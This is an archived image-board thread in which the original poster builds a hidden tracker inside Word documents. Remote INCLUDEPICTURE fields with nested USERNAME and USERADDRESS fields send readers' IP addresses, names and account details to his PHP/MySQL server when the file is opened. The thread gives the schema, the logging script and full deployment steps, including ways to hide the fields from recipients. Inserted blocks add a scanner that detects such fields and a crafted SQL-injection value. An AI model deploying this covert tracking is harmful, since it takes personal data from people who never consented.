Word document tracking

You are currently reading a thread in /g/ - Technology

Thread replies: 33
Thread images: 4
File: IMG_20160115_145058.jpg (719 KB, 2552x2292)
Hey /g/, i'm writing a report for my education and i would like to track who reads, edits, prints, etc. it.
i already made a kind of tracking pixel that's working and i'm able to embed it into the word file, i tested it and it contacts the server upon opening of the document.

Now i discovered that apart from INCLUDEPICTURE there are other word-fields like USERNAME and LASTSAVEDBY.
i should (not tested) be able to use these in the includepicture URL.
I'm looking into somehow escaping/encoding the strings so they don't trip up my server or the db.

I was wondering, how legal/ethical is this and how will normies perceive it when they catch my tracker (alt+F9)?

Hints and tips regarding development are appreciated, i will share the code along the way
>>
Very unethical as they don't give permission to be tracked.

Also, why don't you use Google Docs or something, there you can see who views it etc?
>>
>>52434654
botnet
op
thefuck
neet
erf
this
>>
>>52434684
I'm not tracking, i'm logging the requests to my webserver.
Information like last save date and username is metadata and by using microsoft office you are allowing documents to access that info.
I also host the images remotely to decrease file size on disk and in emails (most have 50mb inbox).

As far as permission goes, my document contains this text:

{INCLUDEPICTURE \d "url?u={USERNAME \* MERGEFORMAT}" \* MERGEFORMATINET}

I think it should be their responsibility to disable auto-loading/interpreting of remote images, if they didn't disable it i see it as them making the request and not my document.
>b-b-but i can't disable it!
Well, you should've used a viewer that could.

No google docs because i need to submit it as a file and it needs to work offline.

>>52434810
Relax, it's only metadata, mostly.
>>
I've seen this thread before AND all of the replies so far. Either you're samefagging hard or I'm dejavuing hard.
>>
>>52435937
Bruh, i'm not samefagging.
http://didyouknow.org/products/

I have not seen another thread about this, could you link me to some archive?

Did the other OP work out a POC and if yes, can i see it?
>>
>>52435894
>Relax, it's only metadata, mostly.
>we kill people based on metadata
>>
>>52435894
The NSA was only collecting metadata too.
>>
>>52436374
>Errasse humanum est.

>>52436392
I know, that's why i said it.
>>
>>52435937
>i've seen this thread before
>not providing link
>>
this is why you should never trust doc/pdf/anything
aside from the tracking pixel, I don't understand how this works OP but it looks impressive
>>
>>52436951
It includes a php page as a pic, the php page returns a picture.
it gives the $_GET variable to the php page which logs it into the DB.
The username in the URL *should* work like this but it doesn't.

Everything in a smaller fontsize is an example of the metadata i can log.


I'm stuck at using the {USERNAME} in the url, if i get past that i think i can do it.
>>
>>52437077
Literally within 2 minutes of posting this i got past the {USERNAME} in the URL.

I really hope the viewer doesn't press ALT+F9, he knows some programming languages and will know what it is.
Hopefully word blocks ALT+F9 if the document is marked final, is protected against editing and has a digital signature.
>>
File: db_structure.png (45 KB, 654x371)
MySQL Database structure.

SQL:

CREATE TABLE IF NOT EXISTS `tracker_data` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
`ip_string` text COLLATE utf8_bin,
`ip_long` bigint(20) unsigned NOT NULL,
`last_saved_by` text COLLATE utf8_bin,
`print_date` text COLLATE utf8_bin,
`user_name` text COLLATE utf8_bin,
`user_address` text COLLATE utf8_bin,
`user_initials` text COLLATE utf8_bin,
`save_date` text COLLATE utf8_bin,
`rev_num` int(10) unsigned NOT NULL,
`edit_time` text COLLATE utf8_bin,
`author` text COLLATE utf8_bin,
`tag` text COLLATE utf8_bin,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin AUTO_INCREMENT=1 ;
>>
>>52437701
I realize no-one is lurking here, but i'll share anyway
>>
>>52437721
Fucking bugs, forgot a ? in the query.
This is fixed version:

<?php
ob_start();
ini_set('display_errors',0);
$db=mysqli_connect('127.0.0.1','user','password','db');
$qr=$db->prepare('INSERT INTO `tracker_data` '.
'(`ip_string`,`ip_long`,`last_saved_by`,`print_date`,`user_name`,`user_address`,`user_initials`,`save_date`,`rev_num`,`edit_time`,`author`,`tag`) VALUES '.
'(?,?,?,?,?,?,?,?,?,?,?,?);');

$ip_string=$_SERVER['REMOTE_ADDR'];
$ip_long=ip2long($_SERVER['REMOTE_ADDR']);
$last_saved_by=$_GET['l'];
$print_date=$_GET['p'];
$user_name=$_GET['u'];
$user_address=$_GET['a'];
$user_initials=$_GET['i'];
$save_date=$_GET['s'];
$rev_num=$_GET['r'];
$edit_time=$_GET['e'];
$author=$_GET['c'];
$tag=$_GET['t'];

$qr->bind_param('sissssssisss',$ip_string,$ip_long,$last_saved_by,$print_date,$user_name,$user_address,$user_initials,$save_date,$rev_num,$edit_time,$author,$tag);

$qr->execute();
$qr->free_result();
$qr->close();
mysqli_close($db);
ob_end_clean();
header("Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate");
header("Expires: Wed, 11 Jan 2000 12:59:00 GMT");
//header("Last-Modified: Wed, 11 Jan 2006 12:59:00 GMT");
header("Pragma: no-cache");
header('Content-Type: image/png');
readfile('myImage.png');
exit();
>>
>>52436243
>>52436786
Honestly I might be tripping. But it seems like I read the same thing a month ago
>>
>>52437894
You ARE tripping because i coded this today, or someone else also invented it before me
>>
>>52437927
Post word document Source photo URL structure pls

>>52437446
Why text and not varchar(255)?
>>
>>52437844
How to deploy:
>execute sql to create table >>52437446
>make php page using php code >>52437844
>upload your image to server
>in word, goto INSERT tab and select FIELD (in Quick Parts dropdown)
>select INCLUDEPICTURE and enter the plain URL to the php page
>check Data not stored in document, optionally check the resize options.
>hit OK
>if you don't see strange field codes like the image, press ALT+F9 (google the shortcut for non-windows)
>place cursor at end of .php and add a ?

add info
>at the end of the url, add l=
>place the cursor just after the =
>insert another field, this time use the lastsavedby field
>tune format settings and confirm insert dialog

>Repeat adding info for the following combinations:
l lastsavedby
p printdate
u username
a useraddress
i userinitials
s savedate
r revnum
e edittime
c author
t (instead of a field place identification tag)

>press ALT+F9 to hide the stuff.
>press CTRL+S
>press CTRL+W
>press CTRL+O and select the document
>goto image place (where you placed the include picture and all the stuff)
>if you see code, right click and select toggle field codes until all gone
>save
>mark as final and digitally sign to prevent editing (and pray for word blocking ALT+F9 this way)
>send to normies
>get their IP's, username, microsoft account display name, microsoft account address (if set), ms account initials, and meta-data that show if they edited it after you.

YOU CANNOT TYPE THE STUFF OUT OF THE PIC, you need to manually add it field by field.

>>52438004
see this post
i was too lazy to enter 255 in the length field and i don't know how long it can be
>>
>>52438141
i forgot, after the very last \* in the stuff you need to put MERGEFORMATINET
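
Seen from the receiving side, the field construction described in the posts above can be found without opening the file in Word. The following is an added example, not part of the thread: it rebuilds field instructions (nested fields included) from a .docx and reports INCLUDEPICTURE fields that point at an http(s) URL. The sample document and the host `tracker.example` are constructed.

```python
import io, re, zipfile
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"

def fields_in_part(xml_bytes):
    """Rebuild every field instruction in one XML part, nested fields included."""
    done, stack = [], []          # stack entries: [instruction text, in_result flag]
    for el in ET.fromstring(xml_bytes).iter():
        kind = el.get(W + "fldCharType")
        if el.tag == W + "fldSimple":
            done.append(el.get(W + "instr", "").strip())
        elif el.tag == W + "instrText" and stack and not stack[-1][1]:
            stack[-1][0] += el.text or ""
        elif kind == "begin":
            stack.append(["", False])
        elif kind == "separate" and stack:
            stack[-1][1] = True   # what follows is the cached result, not code
        elif kind == "end" and stack:
            instr = stack.pop()[0].strip()
            done.append(instr)
            if stack and not stack[-1][1]:
                stack[-1][0] += "{" + instr + "}"   # keep nested field visible in parent
    return done

def remote_picture_fields(docx_bytes):
    """Return (part name, instruction, nested field names) per remote INCLUDEPICTURE."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        parts = [n for n in z.namelist() if re.fullmatch(r"word/[^/]+\.xml", n)]
        for name in parts:
            for instr in fields_in_part(z.read(name)):
                if re.match(r"INCLUDEPICTURE\b", instr, re.I) and re.search(r"https?://", instr, re.I):
                    hits.append((name, instr, re.findall(r"\{\s*(\w+)", instr)))
    return hits

def sample_docx():
    """Constructed sample: INCLUDEPICTURE with a nested USERNAME field in its URL."""
    c = lambda t: '<w:r><w:fldChar w:fldCharType="%s"/></w:r>' % t
    i = lambda s: '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>' % s
    body = (c("begin") + i(' INCLUDEPICTURE \\d "http://tracker.example/t.php?u=')
            + c("begin") + i(" USERNAME ") + c("separate") + "<w:r><w:t>alice</w:t></w:r>"
            + c("end") + i('" \\* MERGEFORMATINET ') + c("separate") + c("end"))
    xml = ('<w:document xmlns:w="%s"><w:body><w:p>%s</w:p></w:body></w:document>'
           % (W[1:-1], body))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", xml)
    return buf.getvalue()
```

For files from untrusted senders, swap ElementTree for the defusedxml package's drop-in parser.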
>>
File: Screenshot_20160115-124659.png (1 MB, 1920x1080)
OP here, can someone confirm this is working?
It works for me but idk if it does for others
>>
>>52438004
I'll manufacture a word .docx for you, wait 20 mins
>>
>>52439289
I've decided to redesign the entire thing, what i posted earlier still works (if you deploy it on your own server).
>>
>>52440987
I'm done with redesign.
I've created a test document and i'm handing it to a normie to test.
>>
>>52434654
>escaping strings
in php using sqlite3 db I escape strings this way
$username = SQLite3::escapeString($_GET['username']);

check php documentation to find out how to use it with mysqli
>>
>>52441749
With mysqli you don't need to escape the strings if you use the bind_param() method.

bind_param() does not just insert the string into the query, it actually passes the string into the field in the table.
It's SQL-injection proof, i tried it.
>>
>>52441793
Wanted to add this also:
If you learn yourself to use bind_param() all the time, you will never forget to escape the strings.
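
The difference the two posts above describe, bound parameters versus values pasted into the SQL text, as an added example that is not part of the thread. Python's sqlite3 stands in for PHP's mysqli, the table is cut down to two of the thread's columns, and the query strings used with it are constructed.

```python
import sqlite3
from urllib.parse import parse_qs

def make_db():
    """In-memory stand-in for the thread's tracker_data table (two columns only)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tracker_data (user_name TEXT, tag TEXT)")
    return db

def _params(query_string):
    # u and t are the URL parameter names used in the thread
    q = parse_qs(query_string, keep_blank_values=True)
    return q.get("u", [""])[0], q.get("t", [""])[0]

def log_concat(db, query_string):
    """Unsafe: request values become part of the SQL statement itself."""
    u, t = _params(query_string)
    db.execute("INSERT INTO tracker_data (user_name, tag) VALUES ('%s', '%s')" % (u, t))

def log_bound(db, query_string):
    """Safe: the statement is fixed; values are passed separately as parameters."""
    u, t = _params(query_string)
    db.execute("INSERT INTO tracker_data (user_name, tag) VALUES (?, ?)", (u, t))

def rows(db):
    return db.execute("SELECT user_name, tag FROM tracker_data").fetchall()

# Constructed requests: an ordinary name with an apostrophe, and a value
# that closes the string literal and supplies its own tag.
PLAIN = "u=O%27Brien&t=report-1"
CRAFTED = "u=x%27%2C+%27forged%27%29+--&t=report-1"
```

With `log_concat`, `PLAIN` fails with a syntax error and `CRAFTED` stores a tag the server never set; with `log_bound`, both values are stored exactly as received.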
>>
Pray that nobody from the EU opens your file because that kind of tracking has been made illegal last year.
>>
>>52441793
>>52441814
Good to know. Thanks, fαm!
>>
>>52441824
Sauce?

I'm in the EU and everyone who has received a copy of my tracker is aware of the tracking and consented to it.
AFAIK this is subject to mandatory anoy-ifications that read "To provide you better bullshit we use cookies/trackers"
>>
>>52441848
http://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php
see 2. of the selected answer.

AFAIK this is THE way to do it, i always do it like this:

$db=mysqli_connect("mainframe.fbi.gov","root","Password1!","myDB");
$data1=420;
$data2=419>$data1?"Too high!":"All fine";
$query=$db->prepare('INSERT INTO `table1` (`field1`,`field2`) VALUES (?,?);');
$query->bind_param('ss',$data1,$data2);
$query->execute();
$query->free_result();
$query->close();
mysqli_close($db);
return "u fulin now it bitch";


How do you make your queries?
>>
>>52441993
shit, i meant 219<$data1